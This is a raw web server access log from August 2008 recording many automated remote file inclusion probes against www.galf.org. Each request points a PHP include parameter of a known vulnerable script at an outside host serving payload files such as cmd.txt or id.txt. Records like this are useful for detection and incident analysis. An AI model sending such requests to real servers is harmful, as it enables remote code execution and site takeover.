219.117.239.114 - - [10/Aug/2008:17:41:58 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.85.130.159 - - [10/Aug/2008:17:43:22 -0700] "GET /logs/add.php?snake=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
195.85.130.159 - - [10/Aug/2008:17:43:22 -0700] "GET /add.php?snake=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:17:43:44 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:17:43:44 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
124.217.242.2 - - [10/Aug/2008:17:44:16 -0700] "GET /logs/access_070827.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
151.1.210.219 - - [10/Aug/2008:17:46:22 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:17:46:31 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:17:46:31 -0700] "GET //include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:17:46:32 -0700] "GET /logs//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:47:00 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:48:02 -0700] "GET /logs/access_080505.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:48:02 -0700] "GET /errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:48:02 -0700] "GET /logs/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:17:48:06 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:17:48:06 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:17:48:09 -0700] "GET /logs/access_080107.log//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:48:24 -0700] "GET /logs/access_080714.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:49:16 -0700] "GET /logs/access_080428.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:49:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:17:49:29 -0700] "GET /logs/access_080107.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:49:56 -0700] "GET /logs/access_071008.log/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:49:56 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:50:17 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:50:37 -0700] "GET /logs/access_080114.log/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:52:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:52:23 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:54:06 -0700] "GET /logs/access_071231.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
117.110.206.130 - - [10/Aug/2008:17:54:07 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
117.110.206.130 - - [10/Aug/2008:17:54:26 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:20 -0700] "GET /logs/access_070924.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:22 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:24 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9661 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:31 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:38 -0700] "GET /logs/access_070924.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:40 -0700] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:55:42 -0700] "GET /logs/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.169.0.50 - - [10/Aug/2008:17:55:48 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
62.169.0.50 - - [10/Aug/2008:17:55:48 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:17:56:50 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:56:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:17:56:52 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:56:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:17:56:52 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:17:56:52 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.16.159 - - [10/Aug/2008:17:56:54 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.16.159 - - [10/Aug/2008:17:56:54 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.16.159 - - [10/Aug/2008:17:56:54 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:17:57:03 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:17:57:03 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:17:57:03 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:17:57:05 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:17:57:05 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:17:57:05 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.156 - - [10/Aug/2008:17:57:13 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
89.108.67.156 - - [10/Aug/2008:17:57:14 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
89.108.67.156 - - [10/Aug/2008:17:57:14 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
77.221.130.6 - - [10/Aug/2008:17:57:16 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.6 - - [10/Aug/2008:17:57:17 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.6 - - [10/Aug/2008:17:57:17 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:57:18 -0700] "GET /classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:17:57:19 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:17:57:29 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:17:57:29 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:17:57:29 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:58:10 -0700] "GET //include/write.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:58:10 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:17:59:35 -0700] "GET //functions.php?include_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:17:59:35 -0700] "GET /logs//functions.php?include_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:59:38 -0700] "GET /logs/access_071029.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:59:38 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:59:38 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:00:04 -0700] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:00:04 -0700] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
212.227.109.150 - - [10/Aug/2008:18:00:36 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.109.150 - - [10/Aug/2008:18:00:37 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.109.150 - - [10/Aug/2008:18:00:37 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:02:25 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:02:27 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:02:30 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:02:32 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:02:33 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:02:33 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.84.119.204 - - [10/Aug/2008:18:03:51 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.84.119.204 - - [10/Aug/2008:18:03:52 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.84.119.204 - - [10/Aug/2008:18:03:55 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:53 -0700] "GET /logs/access_080414.log/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:53 -0700] "GET /logs/access_080414.log/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:53 -0700] "GET /index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:53 -0700] "GET /index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:54 -0700] "GET /logs/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:04:54 -0700] "GET /logs/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:18:05:21 -0700] "GET /logs/access_071231.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:18:07:10 -0700] "GET /logs/access_071028.log/hpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:18:07:10 -0700] "GET /hpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:18:07:12 -0700] "GET /logs/access_071028.log/hpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:18:07:12 -0700] "GET /hpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:18:07:13 -0700] "GET /logs/hpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
